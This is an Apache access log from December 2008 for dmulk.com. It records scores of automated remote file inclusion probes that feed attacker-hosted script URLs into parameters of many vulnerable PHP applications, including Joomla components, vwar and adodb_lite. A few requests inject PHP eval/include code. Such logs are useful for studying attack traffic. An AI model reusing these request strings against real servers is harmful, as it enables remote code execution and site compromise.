208.77.100.195 - - [08/Dec/2008:09:50:51 -0800] "GET /logs/access_081022.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:52 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:50:56 -0800] "GET /logs/access_081107.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:58 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:51:07 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:51:07 -0800] "GET /errors.php?error=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:51:07 -0800] "GET /logs/errors.php?error=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:51:20 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:51:20 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:51:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:51:43 -0800] "GET /logs/access_080401.log%20%20/errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:51:43 -0800] "GET /logs/errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:51:43 -0800] "GET /errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:51:45 -0800] "GET /logs/access_081027.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:51:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:51:54 -0800] "GET /logs/access_080929.log//contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:52:06 -0800] "GET /logs/access_080511.log%20%20/errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.234.106.106 - - [08/Dec/2008:09:52:11 -0800] "GET /index.php?Itemid=&option=com_wrapper&mosConfig_absolute_path=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt? HTTP/1.1" 200 95212 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.24 - - [08/Dec/2008:09:52:17 -0800] "GET /logs/access_080913.log HTTP/1.1" 200 1900544 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:53:12 -0800] "GET /logs/access_081120.log/errors.php?error=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:53:22 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:53:22 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.37 - - [08/Dec/2008:09:53:26 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-102.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:53:29 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:53:29 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:53:30 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:53:30 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:53:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:53:34 -0800] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:53:34 -0800] "GET /skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:53:42 -0800] "GET /logs/access_080521.log//skin/zero_vote/error.php?dir=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:53:48 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:53:48 -0800] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:53:48 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:54:01 -0800] "GET /logs/access_080127.log/components/com_rsgallery/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:54:01 -0800] "GET /components/com_rsgallery/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:54:02 -0800] "GET /logs/components/com_rsgallery/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:54:03 -0800] "GET /logs/access_080928.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.160.184.192 - - [08/Dec/2008:09:54:10 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
67.160.184.192 - - [08/Dec/2008:09:54:10 -0800] "GET /blog/wp-content/gallery/techstoc-2008/img_1023.jpg HTTP/1.1" 200 313610 "http://www.klr650.net/forums/showthread.php?t=53443" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
124.0.71.7 - - [08/Dec/2008:09:54:28 -0800] "GET /logs/access_080928.log/components/com_rsgallery/errors.php?error=http://swingtradesignal.com/bi1tXl334t.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:46 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:57 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:54:58 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:06 -0800] "GET /logs/access_080523.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:55:06 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:09 -0800] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:09 -0800] "GET /protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:09 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:22 -0800] "GET /logs/show.php?page=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:22 -0800] "GET /show.php?page=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:55:23 -0800] "GET /logs/show.php?page=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:55:23 -0800] "GET /show.php?page=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:55:30 -0800] "GET /logs/show.php?page=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:55:30 -0800] "GET /show.php?page=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:55:33 -0800] "GET /protection.php?action=logout&siteurl=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:36 -0800] "GET /logs/show.php?page=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:36 -0800] "GET /show.php?page=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:55:37 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 77030 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:55:38 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:55:39 -0800] "GET /?path%5Bdocroot%5D=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 94720 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:46 -0800] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:55:54 -0800] "GET /logs/access_080905.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:55:57 -0800] "GET /logs/access_080518.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:55:58 -0800] "GET /protection.php?action=logout&siteurl=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:01 -0800] "GET /logs/protection.php?action=logout&siteurl=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:02 -0800] "GET /logs/access_080322.log/protection.php?action=logout&siteurl=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:02 -0800] "GET /protection.php?action=logout&siteurl=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:08 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:08 -0800] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:08 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.169.240.236 - - [08/Dec/2008:09:56:19 -0800] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:22 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:25 -0800] "GET /logs/access_080715.log/protection.php?action=logout&siteurl=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
195.56.55.158 - - [08/Dec/2008:09:56:44 -0800] "GET /logs/access_080919.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.55.158 - - [08/Dec/2008:09:56:53 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.55.158 - - [08/Dec/2008:09:56:53 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:58 -0800] "GET /logs/access_080601.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:58 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:56:58 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/access_080503.log/index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/access_080509.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/access_080519.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.11.126.16 - - [08/Dec/2008:09:57:02 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.lycos.es/mnbmnb/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:57:02 -0800] "GET /logs/access_080401.log/errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [08/Dec/2008:09:57:03 -0800] "GET /index.php?language=http://vennom.t35.com/idfell.txt??? HTTP/1.1" 200 94669 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:14 -0800] "GET /logs/access_080720.log/contenido.php?sec=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:14 -0800] "GET /contenido.php?sec=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:14 -0800] "GET /logs/contenido.php?sec=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:20 -0800] "GET /logs/access_081014.log/contenido.php?sec=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:57:32 -0800] "GET /logs/access_080511.log/errors.php?error=http://grasso59.altervista.org/id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:47 -0800] "GET /logs//popup_window.php?site_isp_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:47 -0800] "GET /popup_window.php?site_isp_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.226.135 - - [08/Dec/2008:09:57:48 -0800] "GET /logs/access_081114.log//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.40.226.135 - - [08/Dec/2008:09:57:48 -0800] "GET /logs//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.40.226.135 - - [08/Dec/2008:09:57:48 -0800] "GET /classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:49 -0800] "GET /logs//popup_window.php?site_isp_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:57:50 -0800] "GET /popup_window.php?site_isp_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
